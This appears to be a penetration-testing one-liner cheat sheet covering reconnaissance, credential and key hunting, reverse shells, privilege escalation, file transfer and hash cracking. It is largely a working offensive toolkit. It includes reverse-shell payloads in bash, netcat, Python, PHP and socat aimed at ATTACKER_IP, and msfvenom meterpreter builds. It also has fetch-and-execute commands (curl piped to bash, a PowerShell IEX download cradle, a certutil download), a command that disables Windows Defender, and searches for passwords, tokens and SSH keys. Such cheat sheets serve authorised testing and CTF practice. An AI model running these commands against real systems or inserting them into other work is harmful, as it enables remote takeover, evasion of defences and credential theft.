// Oneliners

clone this collection GitHub ↗ 
git clone https://github.com/ledksv/oneliners.git

Recon & Enumeration

nmap — full scan with scripts
nmap -sV -sC -p- --min-rate 5000 -oN nmap.txt TARGET
nmap — top 200 UDP ports
nmap -sU --top-ports 200 TARGET
nmap — all vuln scripts
nmap --script=vuln TARGET
nmap — just show open ports
nmap -p- -T4 TARGET | grep open
masscan — full port scan
masscan -p1-65535 TARGET --rate=1000
gobuster — dir scan with extensions
gobuster dir -u http://TARGET -w /usr/share/wordlists/dirb/common.txt -x php,html,txt -t 50 -o gobuster.txt
ffuf — dir scan
ffuf -u http://TARGET/FUZZ -w /usr/share/wordlists/dirb/common.txt -mc 200,301,302
ffuf — vhost fuzzing
ffuf -u http://TARGET -H 'Host: FUZZ.TARGET' -w subdomains.txt -fs 0
curl — clean robots.txt
curl -s http://TARGET/robots.txt | grep -v '#'
curl — check headers
curl -I http://TARGET
whatweb — detect web tech stack
whatweb http://TARGET
nikto — web vulnerability scan
nikto -h http://TARGET -o nikto.txt
enum4linux — full SMB enumeration
enum4linux -a TARGET 2>/dev/null | tee enum4linux.txt
smbmap — SMB share listing
smbmap -H TARGET
smbclient — anonymous SMB shares
smbclient -L //TARGET -N
showmount — NFS exports
showmount -e TARGET
snmpwalk — SNMP walk
snmpwalk -c public -v1 TARGET 2>/dev/null
ldapsearch — anonymous LDAP dump
ldapsearch -x -H ldap://TARGET -b 'dc=domain,dc=com' 2>/dev/null
dig — all DNS records
dig TARGET ANY +noall +answer
dig — DNS zone transfer
dig axfr @TARGET domain.com
theHarvester — OSINT all sources
theHarvester -d domain.com -b all 2>/dev/null
wpscan — full WordPress scan
wpscan --url http://TARGET -e u,ap,at --plugins-detection aggressive
cewl — generate wordlist from site
cewl http://TARGET -m 5 -w custom_wordlist.txt

File Finding

find SUID binaries
find / -perm -4000 -type f 2>/dev/null
find writable files
find / -writable -type f 2>/dev/null | grep -v proc
find SSH / crypto keys
find / -name id_rsa -o -name '*.pem' -o -name '*.key' 2>/dev/null
find config files
find / -name 'wp-config.php' -o -name 'config.php' -o -name '.env' 2>/dev/null
find configs containing password
find / -name '*.conf' -exec grep -l 'password' {} \; 2>/dev/null
find files modified last 10 mins
find / -mmin -10 -type f 2>/dev/null | grep -v proc
find CTF flags
find / -name 'flag*' -o -name 'user.txt' -o -name 'root.txt' 2>/dev/null
grep passwords in webroot
grep -r 'password' /var/www/html/ 2>/dev/null
check bash history for creds
cat ~/.bash_history | grep -i 'pass\|ssh\|mysql\|ftp'

Reverse Shells

Listener first: Always start your listener before triggering the shell. nc -lvnp 4444
bash reverse shell
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
bash via -c
bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'
netcat mkfifo
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP 4444 >/tmp/f
netcat -e
nc -e /bin/bash ATTACKER_IP 4444
python3 reverse shell
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh"])'
PHP reverse shell
php -r '$s=fsockopen("ATTACKER_IP",4444);$proc=proc_open("/bin/sh",array(0=>$s,1=>$s,2=>$s),$pipes);'
socat stable shell
socat TCP:ATTACKER_IP:4444 EXEC:'bash -li',pty,stderr,setsid,sigint,sane
msfvenom — Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f elf > shell.elf
msfvenom — Windows EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe > shell.exe

Shell Upgrade / Stabilisation

upgrade to PTY (Python)
python3 -c 'import pty;pty.spawn("/bin/bash")'
full TTY stabilisation
# Step 1 — on target
python3 -c 'import pty;pty.spawn("/bin/bash")'

# Step 2 — Ctrl+Z then on your machine
stty raw -echo; fg

# Step 3 — back in shell
export TERM=xterm
export SHELL=bash

Privilege Escalation — Linux

check sudo permissions
sudo -l
SUID binaries with details
find / -perm -4000 -type f 2>/dev/null | xargs ls -la
find capabilities
getcap -r / 2>/dev/null
all cron jobs
cat /etc/crontab && ls -la /etc/cron*
root processes
ps aux | grep root | grep -v grep
listening services (internal)
ss -tulpn | grep LISTEN
kernel and OS version
uname -a && cat /etc/os-release
docker detection
cat /proc/1/cgroup | grep -qi docker && echo IN_DOCKER
secrets in environment
env | grep -i 'pass\|key\|token\|secret'
writable shell scripts
find / -name '*.sh' -writable 2>/dev/null
run LinPEAS from attacker machine
curl -s http://ATTACKER_IP:8080/linpeas.sh | bash
pspy — monitor processes
wget -q http://ATTACKER_IP:8080/pspy64 -O /tmp/pspy && chmod +x /tmp/pspy && /tmp/pspy

Privilege Escalation — Windows

full user info — privs + groups
whoami /all
users and local admins
net user && net localgroup administrators
OS and patches
systeminfo | findstr /i "os name\|os version\|hotfix"
unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"
AlwaysInstallElevated check
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2>nul
in-memory PowerShell execution
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/shell.ps1')"
download with certutil
certutil -urlcache -f http://ATTACKER_IP/shell.exe C:\Windows\Temp\shell.exe
registry password search
reg query HKLM /f password /t REG_SZ /s 2>nul
disable Defender (requires admin)
powershell -ep bypass -c "Set-MpPreference -DisableRealtimeMonitoring $true"

Network

all IP addresses
ip a | grep 'inet ' | awk '{print $2}'
internal routes and subnets
ip route | grep -v default
ARP cache — nearby hosts
arp -a | grep -v incomplete
bash ping sweep
for i in $(seq 1 254); do (ping -c1 -W1 192.168.1.$i >/dev/null && echo 192.168.1.$i) & done; wait
bash port scan
for p in 21 22 23 25 53 80 443 445 3306 3389 8080; do (echo >/dev/tcp/TARGET/$p) 2>/dev/null && echo $p open; done
tcpdump — capture HTTP
tcpdump -i eth0 port 80 -A
tcpdump — capture SMB to file
tcpdump -i eth0 'port 445 or port 139' -w smb.pcap

File Transfer

serve files — Python HTTP server
python3 -m http.server 8080
download — wget
wget http://ATTACKER_IP:8080/file -O /tmp/file
download — curl
curl http://ATTACKER_IP:8080/file -o /tmp/file
upload via SCP
scp file.txt user@TARGET:/tmp/
receive file with netcat
# Receiver (target):
nc -lvnp 4444 > received_file

# Sender (attacker):
nc TARGET 4444 < file_to_send
encode file to base64
base64 -w 0 file.sh
decode base64 to file
echo 'BASE64STRING' | base64 -d > file.sh

Hash & Cracking

hash a string — MD5
echo -n 'password' | md5sum
hash a string — SHA256
echo -n 'password' | sha256sum
identify hash type
hash-identifier 'HASH_VALUE'
hashcat — crack MD5 (-m 0)
hashcat -m 0 hash.txt rockyou.txt --force
hashcat — crack NTLM (-m 1000)
hashcat -m 1000 hash.txt rockyou.txt --force
hashcat — SHA512crypt (-m 1800)
hashcat -m 1800 hash.txt rockyou.txt --force
hashcat — Kerberoast (-m 13100)
hashcat -m 13100 kerb.txt rockyou.txt --force
hashcat — AS-REP roast (-m 18200)
hashcat -m 18200 asrep.txt rockyou.txt --force
john — wordlist crack
john --wordlist=rockyou.txt hash.txt
john — crack shadow file
unshadow /etc/passwd /etc/shadow > combined.txt && john combined.txt --wordlist=rockyou.txt
john — crack SSH key
ssh2john id_rsa > id_rsa.hash && john id_rsa.hash --wordlist=rockyou.txt
Common Hashcat Modes: 0 = MD5 · 100 = SHA1 · 1000 = NTLM · 1400 = SHA256 · 1800 = SHA512crypt · 3200 = bcrypt · 5500 = NTLMv1 · 5600 = NTLMv2 · 13100 = Kerberoast · 18200 = AS-REP